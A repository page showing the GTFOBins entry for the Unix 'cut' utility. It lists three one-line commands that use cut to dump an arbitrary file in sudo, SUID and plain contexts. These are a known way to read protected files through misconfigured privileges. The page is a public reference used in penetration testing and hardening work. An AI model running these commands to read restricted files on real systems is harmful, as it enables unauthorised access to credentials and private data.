This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
fce5a223416aeb8aeaf6b53485eda283bf54393b
GTFOBins.github.io
/
_gtfobins
/
cut.md
Emilio Pinna
fce5a22341
Add sudo-enabled to cut
2018-06-16 16:13:16 +01:00
287 B
Raw
Blame
History
functions
functions
sudo-enabled
suid-enabled
file-read
code
LFILE=file_to_read sudo cut -d "" -f1 "$LFILE"
code
LFILE=file_to_read ./cut -d "" -f1 "$LFILE"
code
LFILE=file_to_read cut -d "" -f1 "$LFILE"
Reference in New Issue
View Git Blame
Copy Permalink